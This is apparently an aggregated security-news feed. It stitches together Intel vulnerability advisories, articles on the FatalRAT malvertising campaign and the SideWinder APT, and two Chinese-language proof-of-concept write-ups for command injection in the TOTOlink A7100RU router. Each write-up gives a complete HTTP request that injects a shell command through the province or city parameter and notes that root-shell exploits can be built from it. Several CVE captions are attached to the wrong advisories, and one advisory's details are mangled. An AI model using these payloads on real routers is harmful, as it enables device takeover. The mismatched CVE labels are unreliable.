Uncontrolled search path element in the Intel(R) oneAPI Data Analytics Library (oneDAL) before version 2021.5 for Intel(R) oneAPI Base Toolkit may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® oneAPI Toolkits Advisory**

**Summary:**

Potential security vulnerabilities in some Intel® oneAPI Toolkits may allow escalation of privilege. Intel is releasing software updates to mitigate these potential vulnerabilities.  
 

**Vulnerability Details:**

CVEID: CVE-2022-25987

Description: Improper handling of Unicode encoding in source code to be compiled by the Intel(R) C++ Compiler Classic before version 2021.6 for Intel(R) oneAPI Toolkits before version 2022.2 may allow an unauthenticated user to potentially enable escalation of privilege via network access.

CVSS Base Score: 8.3 High

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

CVEID: CVE-2022-26843

Description: Insufficient visual distinction of homoglyphs presented to user in the Intel(R) oneAPI DPC++/C++ Compiler before version 2022.1 for Intel(R) oneAPI Toolkits before version 2022.2 may allow an unauthenticated user to potentially enable escalation of privilege via network access.

CVSS Base Score: 8.3 High

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

CVEID: CVE-2022-25992

Description: Insecure inherited permissions in the Intel(R) oneAPI Toolkits oneapi-cli before version 0.2.0 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.5 High

CVSS Vector:  CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H

CVEID: CVE-2022-26512

Description: Uncontrolled search path element in the Intel(R) FPGA Add-on for Intel(R) oneAPI Base Toolkit before version 2022.2 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVEID: CVE-2022-26345

Description: Uncontrolled search path element in the Intel(R) oneAPI Toolkit OpenMP before version 2022.1 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVEID: CVE-2022-26062

Description: Uncontrolled search path element in the Intel(R) Trace Analyzer and Collector before version 2021.6 for Intel(R) oneAPI HPC Toolkit may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVEID: CVE-2022-25905

Description: Uncontrolled search path element in the Intel(R) oneAPI Data Analytics Library (oneDAL) before version 2021.5 for Intel(R) oneAPI Base Toolkit may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVEID: CVE-2022-26425

Description: Uncontrolled search path element in the Intel(R) oneAPI Collective Communications Library (oneCCL) before version 2021.6 for Intel(R) oneAPI Base Toolkit may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVEID: CVE-2022-26076

Description: Uncontrolled search path element in the Intel(R) oneAPI Deep Neural Network (oneDNN) before version 2022.1 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVEID: CVE-2022-26032

Description: Uncontrolled search path element in the Intel(R) Distribution for Python programming language before version 2022.1 for Intel(R) oneAPI Toolkits may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVEID: CVE-2022-26421

Description: Uncontrolled search path element in the Intel(R) oneAPI DPC++/C++ Compiler Runtime before version 2022.0 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVEID: CVE-2022-26052

Description: Uncontrolled search path element in the Intel(R) MPI Library before version 2021.6 for Intel(R) oneAPI HPC Toolkit may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H  
 

**Affected Products:**

Intel® oneAPI Toolkits before version 2022.2.

Intel® oneAPI DPC++/C++ Compiler before version 2022.1.

Intel® C++ Compiler Classic before version 2021.6

oneapi-cli before version 0.2.0 for Intel® oneAPI Toolkits.

Intel® FPGA Add-on for Intel® oneAPI Base Toolkit before version 2022.2

Intel® Trace Analyzer and Collector before version 2021.6.

Intel® oneAPI Data Analytics Library before version 2021.5.

Intel® oneAPI Collective Communications Library (oneCCL) before version 2021.6.

Intel® Distribution for Python programming language before version 2022.1

Intel® oneAPI Deep Neural Network (oneDNN) before version 2022.1

Intel® oneAPI DPC++/C++ Compiler Runtime before version 2022.0.

Intel® MPI Library before version 2021.6 for Intel® oneAPI HPC Toolkit.  
 

**Recommendation:**

Intel recommends updating Intel® oneAPI Toolkit to version 2022.2 or later.

Toolkit updates are available for download at this location:  
https://www.intel.com/content/www/us/en/developer/tools/oneapi/toolkits.html

Intel recommends updating Intel® oneAPI DPC++/C++ Compiler to version 2022.1 or later.

Toolkit updates are available for download at these locations:  
https://www.intel.com/content/www/us/en/developer/tools/oneapi/base-toolkit-download.html

https://www.intel.com/content/www/us/en/developer/tools/oneapi/hpc-toolkit-download.html

https://www.intel.com/content/www/us/en/developer/tools/oneapi/iot-toolkit-download.html

Standalone updates are available for download at this location:

https://www.intel.com/content/www/us/en/developer/articles/tool/oneapi-standalone-components.html#dpcpp-cpp

Intel recommends updating Intel® C++ Compiler (Classic) to version 2021.6 or later.

Toolkit updates are available for download at these locations:

https://www.intel.com/content/www/us/en/developer/tools/oneapi/hpc-toolkit-download.html

https://www.intel.com/content/www/us/en/developer/tools/oneapi/iot-toolkit-download.html

Standalone updates are available for download at this location:

https://www.intel.com/content/www/us/en/developer/articles/tool/oneapi-standalone-components.html#dpcpp-cpp

Intel recommends updating oneapi-cli to version 0.2.0 or later for Intel® oneAPI Toolkits.

Toolkit updates are available for download at this location:

https://www.intel.com/content/www/us/en/developer/tools/oneapi/toolkits.html

Standalone updates are available for download at this location:

https://github.com/intel/oneapi-cli/releases

Intel recommends updating Intel® FPGA Add-on for Intel® oneAPI Base Toolkit to version 2022.2 or later.

Toolkit updates are available for download at this location:  
https://www.intel.com/content/www/us/en/developer/tools/oneapi/base-toolkit-download.html

Standalone updates are available for download at this location:

https://www.intel.com/content/www/us/en/developer/articles/tool/oneapi-standalone-components.html#fpga

Intel recommends updating Intel® Trace Analyzer and Collector to version 2021.6 or later.

Toolkit updates are available for download at this location:

https://www.intel.com/content/www/us/en/developer/tools/oneapi/hpc-toolkit-download.html

Intel recommends updating Intel® oneAPI Data Analytics Library to version 2021.5 or later.

Toolkit updates are available for download at this location:

https://www.intel.com/content/www/us/en/developer/tools/oneapi/base-toolkit-download.html

Intel recommends updating Intel® oneAPI Collective Communications Library to version 2021.6 or later.

Toolkit updates are available for download at this location:  
https://www.intel.com/content/www/us/en/developer/tools/oneapi/base-toolkit-download.html

Standalone updates are available for download at these locations:

https://github.com/oneapi-src/oneCCL  https://www.intel.com/content/www/us/en/developer/articles/tool/oneapi-standalone-components.html#oneccl

Intel® Distribution for Python programming language to version 2022.1 or later

Toolkit updates are available for download at these locations:  
https://www.intel.com/content/www/us/en/developer/tools/oneapi/base-toolkit-download.html

https://www.intel.com/content/www/us/en/developer/tools/oneapi/ai-analytics-toolkit-download.html?operatingsystem=linux

Standalone updates are available for download at this location:

https://www.intel.com/content/www/us/en/developer/articles/tool/oneapi-standalone-components.html#python

Intel® oneAPI Deep Neural Network (oneDNN) to version 2022.1 or later.

Toolkit updates are available for download at this location:  
https://www.intel.com/content/www/us/en/developer/tools/oneapi/base-toolkit-download.html

Standalone updates are available for download at this location:

https://www.intel.com/content/www/us/en/developer/articles/tool/oneapi-standalone-components.html#onednn

Intel® oneAPI DPC++/C++ Compiler Runtime to version 2022.0 or later.

Toolkit updates are available for download at these locations:

https://www.intel.com/content/www/us/en/developer/tools/oneapi/base-toolkit-download.html

https://www.intel.com/content/www/us/en/developer/tools/oneapi/hpc-toolkit-download.html

https://www.intel.com/content/www/us/en/developer/tools/oneapi/iot-toolkit-download.html

Standalone updates are available for download at this location:

https://www.intel.com/content/www/us/en/developer/articles/tool/oneapi-standalone-components.html#runtime

Intel recommends updating Intel® MPI Library to version 2021.6 or later for Intel® oneAPI HPC toolkit.

Standalone updates are available for download at this location:

https://www.intel.com/content/www/us/en/developer/articles/tool/oneapi-standalone-components.html#mpi  
 

**Acknowledgements:**

Intel would like to thank Aviva Noa CVE-2022-25992, houjingyi CVE-2022-26062.

The following issues were found internally by Intel employees for CVE-2022-26843, CVE-2022-25992, CVE-2022-26512, CVE-2022-26345, CVE-2022-26425, CVE-2022-26076, CVE-2022-26032, CVE-2022-26421, CVE-2022-26052.

Intel would like to thank Intel employees Nikolay Petrov for CVE-2022-25905.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.  

**Revision History**

Revision

Date

Description

1.0

02/14/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-25905: INTEL-SA-00674

Improper conditions check in the Intel(R) SGX SDK software may allow a privileged user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® SGX SDK Advisory**

**Summary: **

Potential security vulnerabilities in the Intel® Software Guard Extensions (SGX) Software Development Kit (SDK) may allow information disclosure.  Intel is releasing software updates to mitigate these potential vulnerabilities.  
 

**Vulnerability Details:**

CVEID: CVE-2022-26509

Description: Improper conditions check in the Intel(R) SGX SDK software may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 2.5 Low

Description: Insufficient control flow management for the Intel(R) SGX SDK software for Linux before version 2.16.100.1 may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 2.5 Low

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N  
 

**Affected Products:**

Intel® SGX SDK software for Linux before version 2.16.100.1.

Intel® SGX SDK software for Windows before version 2.15.100.1.  
 

**Recommendations:**

Intel recommends updating Intel® SGX SDK software for Linux to version 2.16.100.1 or later.

*   Updates are available for download at this location:  
    https://download.01.org/intel-sgx/sgx-linux/

Intel recommends updating Intel® SGX SDK software for Windows to version 2.15.100.1 or later.

*   Updates are available for download at this location:  
    https://registrationcenter.intel.com/en/products/download/3407/  
     

**Acknowledgements:**

Intel would like to thank Jo Van Bulck, Fritz Alder, Frank Piessens, and David Oswald for reporting these issues.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

02/14/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-26509: INTEL-SA-00677

Out-of-bounds read in firmware for the Intel(R) Integrated Sensor Solution before versions 5.4.2.4579v3, 5.4.1.4479 and 5.0.0.4143 may allow a privileged user to potentially enable denial of service via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Integrated Sensor Solution Advisory**

**Summary: **

A potential security vulnerability in the Intel® Integrated Sensor Solution may allow denial of service.  Intel is releasing firmware updates to mitigate this potential vulnerability.  
 

**Vulnerability Details:**

CVEID: CVE-2022-30339

Description: Out-of-bounds read in firmware for the Intel(R) Integrated Sensor Solution before versions 5.4.2.4579v3, 5.4.1.4479 and 5.0.0.4143 may allow a privileged user to potentially enable denial of service via local access.

CVSS Base Score: 6.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

**Affected Products:**

Intel® Integrated Sensor Solution before versions 5.4.2.4579v3, 5.4.1.4479 and 5.0.0.4143.  
 

**Recommendations:**

Intel recommends updating the Intel® Integrated Sensor Solution to versions 5.4.2.4579v3, 5.4.1.4479 and 5.0.0.4143 or later.

Intel recommends that users of the Intel® Integrated Sensor Solution update to the latest version provided by the system manufacturer that addresses these issues.  
 

**Acknowledgements:  
**

Intel would like to thank Jeremy Boone of NCC Group for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

02/14/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-30339: INTEL-SA-00721

By Waqas
The primary target of this malware campaign is Chinese-speaking users in East and Southeast Asia.
This is a post from HackRead.com Read the original post: Google Ads drop FatalRAT malware from fake messenger, browser apps

Find out how Google Ads have been spreading FatalRAT malware recently in fake utility, messenger and browser apps. Learn more about this alarming security issue and how to protect yourself.

Researchers from the Slovak cybersecurity firm ESET have discovered a new malware campaign targeting Chinese-speaking users in East and Southeast Asia.

According to a report published by ESET researchers, hackers are delivering remote access Trojans hidden inside **malicious Google ads**. These misleading ads appear in Google search results and download Trojans installers.

This should not come as a surprise, as Google Ads and **Google Adsense** have been abused lately to deliver malware around the world.

Researchers at ESET noted that the attackers remain unidentified. However, it is confirmed that they are targeting Chinese-speaking individuals. They have designed fake websites that look identical to popular apps like WhatsApp, Firefox, or Telegram.

Through these websites, the attackers deliver remote access Trojans, such as FatalRAT, first detected by AT&T researchers in 2021, to hijack the infected device. Some of the spoofed apps include:

*   LINE
*   Signal
*   Skype
*   Youdao
*   Electrum
*   Telegram
*   WhatsApp
*   WPS Office
*   Mozilla Firefox
*   Google Chrome
*   Sogou Pinyin Method

Researchers discovered the attacks between August 2022 and January 2023. The attack starts by purchasing an ad slot appearing in **Google search results**.

“The attackers purchased advertisements to position their malicious websites in the “sponsored” section of Google search results. We reported these ads to Google, and they were promptly removed,” researchers explained.

Users who search for popular apps are directed to rogue websites with typosquatting domains that host trojanized installers. These installers install the actual app as the user requires, to avoid raising suspicion.

Fake Google Chrome and Telegram websites spreading fake installers infected with FatalRat malware

The FatalRAT malware used in this campaign contains numerous commands to manipulate data from various browsers.

“The websites and installers downloaded from them are mostly in Chinese and in some cases falsely offer Chinese language versions of software that is not available in China,” researchers wrote in their technical report published today.

The downloaded installers aren’t hosted on the same server as the sites, but in Alibaba Cloud Object Storage Service, and are digitally signed MSI files. The installers were uploaded to the cloud storage on 6th January 2023.

After the malware is deployed, the attacker gains full control of the device and can execute arbitrary shell commands, run executables, steal data from web browsers, and log keystrokes.

This campaign has no specific targets, as the attackers want to steal exclusive user data, such as web credentials, to sell them on underground hacker forums or launch additional cybercrime campaigns. However, in their **report**, ESET researchers noted that most victims were located in the following countries:

*   China
*   Taiwan
*   Japan
*   Malaysia
*   Thailand
*   Indonesia
*   Myanmar
*   Philippines
*   Hong Kong

**Detection and protection from fake malicious installers**

Fake, malicious installers can be a significant threat to your computer and personal data. To detect and protect against them, here are some steps you can take:

*   First and foremost, use common sense when downloading files. Never download software, or anything else, from a third-party site. Download software only from trusted sources: Download software only from reputable websites, and avoid downloading from unverified sources.
*   **Verify the authenticity of the website:** Check the website’s URL for spelling errors, and look for security badges and trust seals on the site. For example, **it’s Google.com, not ɢoogle.com**.
*   **Use reliable anti-virus software:** Use reliable anti-virus software and keep it updated to protect your computer from malicious software.
*   **Read reviews and comments:** Read reviews and comments about the software before downloading it; this will give you an idea of the software’s authenticity.
*   **Scan downloaded files:** Use anti-virus software to scan the downloaded file before installing it. You should also use **VirusTotal** to check whether the file is malicious or if the URL you are about to visit is safe.
*   **Use sandboxing software:** Use sandboxing software that can run the installer in a virtual environment, keeping your system safe from any potential harm.
*   **Enable security features:** Enable security features on your computer, such as a firewall, to prevent unauthorized access to your system.

1.  Jupyter infostealer delivered through MSI installer
2.  Fake Zoom installers infect PCs with RevCode RAT
3.  Fake 1Password installer stealing user extract data
4.  Fake Tor browser installer drop malware via YouTube
5.  Fake Windows 11 installers infecting PCs with adware

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Google Ads drop FatalRAT malware from fake messenger, browser apps

The nation-state threat group has been attacking a wider range of victims and regions than previously thought.

Researchers have linked the slippery SideWinder APT to two malicious campaigns — one in 2020 and one in 2021 — that add more volume to an attack spree attributed to the prolific threat actor over the past several years and demonstrate how extensive its arsenal of tactics and tools really is.

A report published this week by Group-IB links SideWinder (aka Rattlesnake or T-APT4) to a known 2020 attack on the Maldivian government, as well as a previously unknown series of phishing operations that targeted organizations in Afghanistan, Bhutan, Myanmar, Nepal, and Sri Lanka between June and November 2021.

The findings show the group casting a far wider net than previously thought using a trove of tools, including previously unidentified remote access Trojans (RATs), backdoors, reverse shells, and stagers. Researchers' investigation of these attacks also links the group to other known APTs, including Baby Elephant — which may in fact be SideWinder itself — and Donot APT, they said.

The report also sheds more light on the geographically dispersed nature of the group's operations, with researchers uncovering IP addresses controlled by SideWinder located in the Netherlands, Germany, France, Moldova, and Russia, the researchers said.

SideWinder, active since 2012, was detected by Kaspersky in the first quarter of 2018 and thought to primarily target Pakistani military infrastructure. However, this latest report shows that the target range of the group — widely believed to be associated with Indian espionage interests — is far broader than that.

"SideWinder has been systematically attacking government organizations in South and East Asia for espionage purposes for about 10 years," Dmitry Kupin, a senior malware analyst on Group-IB's Threat Intelligence team, wrote in the report.

Specifically, researchers identified more than 60 targets — including government bodies, military organizations, law enforcement agencies, central banks, telecoms, media, political organizations, and more — of the newly identified phishing campaign. The targets are located in several countries, including Afghanistan, Bhutan, Myanmar, Nepal, and Sri Lanka.

**Sophisticated Phishing Resources**

The phishing attacks — in which SideWinder impersonates known entities in an attempt to lure victims — also demonstrated how vast its phishing infrastructure is, the researchers said. This makes sense, as spear-phishing has long been the group's initial-access method, they said.

The phishing findings, which did not confirm whether SideWinder was successful in its attempts to compromise victims, also reveal something previously unknown about the group: an interest in targeting cryptocurrency.

In the phishing attacks between June 2021 and November 2021, the group impersonated both the Central Bank of Myanmar, using a website in its arsenal that imitates the financial institution, as well as a contactless Internet of Things (IoT) payment system used in India called Nucleus Vision, also known as Nitro Network.

The campaigns also are notable because they demonstrate SideWinder trying to steal cryptocurrency by imitating an Airdrop of NCASH crypto, the researchers said. NCASH is used as a payment means in the Nucleus Vision ecosystem, which retail stores in India have been using, they said.

Specifically, researchers uncovered a phishing link related to Airdrop — an Apple technology for sending files via its mobile devices. When users visited the link (http://5\[.\]2\[.\]79\[.\]135/project/project/index.html) they were asked to register in order to participate in an Airdrop and receive tokens, though it was not specified which ones. By pressing the "Submit details" button, the user activates a script login.php, which researchers believe the group is using to further develop this attack vector.

**Tools and Telegram**

Group-IB also discovered a trove of custom tools used by SideWinder, only some of which had been described publicly before, developed in various programming languages including C++, C#, Go, Python (compiled script), and VBScript.

Part of that arsenal is the group's newest custom tool, SideWinder.AntiBot.Script, an info-stealer written in Python and used in previously documented phishing attacks against Pakistani organizations.

The script can extract a victim's browsing history from Google Chrome, credentials saved in the browser, the list of folders in the directory, as well as meta information and contents of .docx, .pdf, and .txt files. It's a key part of the group's notoriety for conducting "hundreds of espionage operations within a short span of time," Kupin wrote.

Another and perhaps the "most interesting finding" regarding SideWinder's tools arsenal were RAT samples that used the Telegram messaging app as a channel for receiving the results of malware commands and thus retrieve data stolen from compromised systems, Kupin noted.

This tactic is increasingly becoming a hallmark of many advanced threat actors, he said.

**How to Stave Off SideWinder**

The report includes a vast array of indicators of compromise as well as URLs associated with SideWinder attacks.

Because like many other APT groups SideWinder relies on targeted spear-phishing as the initial attack vector, it's important for organizations "to set up business email protection solutions that are capable of detonating malicious attachments in an isolated virtual environment," Kupin tells Dark Reading. Enterprises should also do socially engineered penetration tests so employees can quickly recognize phishing emails that reach inboxes, he adds.

Organizations at risk from SideWinder also should continuously monitor network activity within the organization's perimeter by employing managed extended detection and response (MXDR) solutions that are regularly updated with fresh network indicators and rules, Kupin says.

SideWinder APT Spotted Stealing Crypto

TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the province parameter at setting/delStaticDhcpRules.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取province参数下的内容传递给v11，之后将v11带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules”,
"province":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2023-24236: ttt/19 at main · Am1ngl/ttt

TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the city parameter at setting/delStaticDhcpRules.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取city参数下的内容传递给v12，之后将v12带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules",
"city":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2023-24238: ttt/20 at main · Am1ngl/ttt

Chinese-speaking individuals in Southeast and East Asia are the targets of a new rogue Google Ads campaign that delivers remote access trojans such as FatalRAT to compromised machines.
The attacks involve purchasing ad slots to appear in Google search results that direct users searching for popular applications to rogue websites hosting trojanized installers, ESET said in a report published

Chinese-speaking individuals in Southeast and East Asia are the targets of a new rogue Google Ads campaign that delivers remote access trojans such as FatalRAT to compromised machines.

